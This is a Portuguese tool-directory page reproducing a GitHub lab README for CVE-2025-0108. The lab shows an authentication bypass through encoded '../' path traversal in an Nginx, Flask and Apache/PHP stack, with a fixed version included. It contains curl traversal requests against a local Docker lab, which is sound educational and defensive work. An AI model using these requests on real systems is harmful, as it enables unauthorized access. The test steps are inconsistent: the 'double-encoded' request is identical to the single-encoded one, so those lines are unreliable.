Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-0108 | Kitploit
Ferramentas/GitHubGitHub/kso4more/cve-2025-0108
Análise de VulnerabilidadesExploração de Aplicações WebAutenticaçãoConfiguração IncorretaAprendizado e EducaçãoLabs e Prática
GitHubkso4more/cve-2025-0108

CVE-2025-0108

Ver Repositório
há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-0108 — Segurança Web (PoC e Correção)

Este repositório contém um pequeno ambiente de laboratório para reproduzir e mitigar o problema CVE-2025-0108 (confusão de caminho / contrabando de cabeçalhos entre Nginx e Apache).
O objetivo da tarefa é demonstrar como requisições duplamente codificadas podem contornar a autenticação em uma pilha de múltiplas camadas (Nginx -> backend Flask -> Apache/PHP) e mostrar uma mitigação no lado do backend.

Este ambiente é apenas para fins educacionais.

Conteúdo

  • CVE-2025-0108/ — implementação vulnerável (PoC)
  • CVE-2025-0108_fix/ — implementação corrigida (backend verifica o caminho decodificado)

PoC (vulnerável) — CVE-2025-0108

Objetivo

Simular a configuração vulnerável onde um caminho duplamente codificado pode contornar a autenticação devido à decodificação inconsistente de caminho entre as camadas.

Iniciar o ambiente

A partir do diretório CVE-2025-0108:

root@kitploit:~
cd CVE-2025-0108
docker compose up --build

Testes

Execute estes comandos curl a partir do seu host:

Teste 1 — duplamente codificado (esperado: HTTP 200)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/%2e%2e/php/ztp_gate.php/PAN_help/x.css"

Esta requisição usa dupla codificação (%252e%252e == %2e%2e == ..) e demonstra o bypass na configuração vulnerável. Deve retornar 200 OK.

Teste 2 — codificado uma vez (esperado: HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/%2e%2e/php/ztp_gate.php/PAN_help/x.css"

Teste 3 — caminho bruto com .. (esperado: HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/../php/ztp_gate.php/PAN_help/x.css"

Parar os ambientes:

root@kitploit:~
docker compose down

Versão corrigida — CVE-2025-0108_fix

O backend realiza uma verificação adicional no caminho decodificado antes de permitir o acesso. Isso impede o bypass de autenticação quando as requisições são duplamente codificadas.

A partir do diretório CVE-2025-0108:

root@kitploit:~
cd CVE-2025-0108
docker compose up --build

Testes

Execute estes comandos curl a partir do seu host:

A partir do diretório CVE-2025-0108_fix:

root@kitploit:~
cd CVE-2025-0108_fix
docker compose up --build

Teste 1 — duplamente codificado (esperado: HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/%2e%2e/php/ztp_gate.php/PAN_help/x.css"

O backend corrigido detecta o .. decodificado e retorna 401 Não Autorizado.

Teste 2 — codificado uma vez (esperado: HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/%2e%2e/php/ztp_gate.php/PAN_help/x.css"

Teste 3 — caminho bruto com .. (esperado: HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/../php/ztp_gate.php/PAN_help/x.css"

Parar os ambientes:

root@kitploit:~
docker compose down
Baixar ferramenta